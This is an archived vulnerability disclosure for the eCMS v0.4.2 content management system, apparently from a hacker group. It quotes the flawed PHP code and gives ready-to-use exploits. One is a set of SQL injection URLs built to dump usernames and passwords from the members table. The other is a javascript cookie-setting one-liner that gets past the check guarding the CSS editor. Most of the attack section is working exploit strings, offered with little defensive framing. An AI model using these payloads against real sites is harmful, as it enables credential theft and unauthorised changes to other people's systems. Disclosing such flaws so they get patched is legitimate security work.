Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx3221.htm

eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities



eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities
eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities



=0D
            =0D
  #######################################################################################=0D
  #                                                                                     #=0D
  #         ...::::eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities  ::::...        #           =0D
  #######################################################################################=0D
=0D
Virangar Security Team=0D
=0D
www.virangar.net=0D 
=0D
--------=0D
Discoverd By :virangar security team(hadihadi)=0D
=0D
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra=0D
=0D
& all virangar members & all hackerz=0D
=0D
greetz:to my best friend in the world hadi_aryaie2004=0D
& my lovely friend arash(imm02tal) =0D
-----=0D
1.sql injection:=0D
-------vuln codes in:-----------=0D
index.php:=0D
line 52:$p = $_GET['p']=0D
..=0D
..=0D
line 55:$query = "SELECT * FROM files WHERE cat = '$p' ORDER BY date DESC";=0D
---=0D
exploit:=0D
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/*=0D 
or=0D
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/*=0D 
#####################=0D
2. Remote Permission Bypass Vulnerability(Insecure Cookie Handling ):=0D
-------vuln codes in:-----------=0D
editCss.php:=0D
=0D
line 17:if(!isset($_COOKIE['pass']))=0D
{=0D
  echo('You\'re not allowed to come here! Go back!');=0D
} else {=0D
....=0D
...=0D
...=0D
-------=0D
/*=0D
if the cookie didn't set for you, you can't allow to see this page..but if we do somethings :) such as :=0D
=0D
javascript:document.cookie = "pass=1; path=/";=0D
=0D
now the cookie is set for you, and you can allow to see the page and edit the CSS in file "style.css"=0D
*/=0D
exploit:=0D
just open your browser and then type:=0D
javascript:document.cookie = "pass=1; path=/";=0D
now see the "editCss.php" and edit the cms CSS :D=0D
-----=0D
young iranian h4ck3rz=0D
=0D
=0D
=0D
=0D
=0D
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH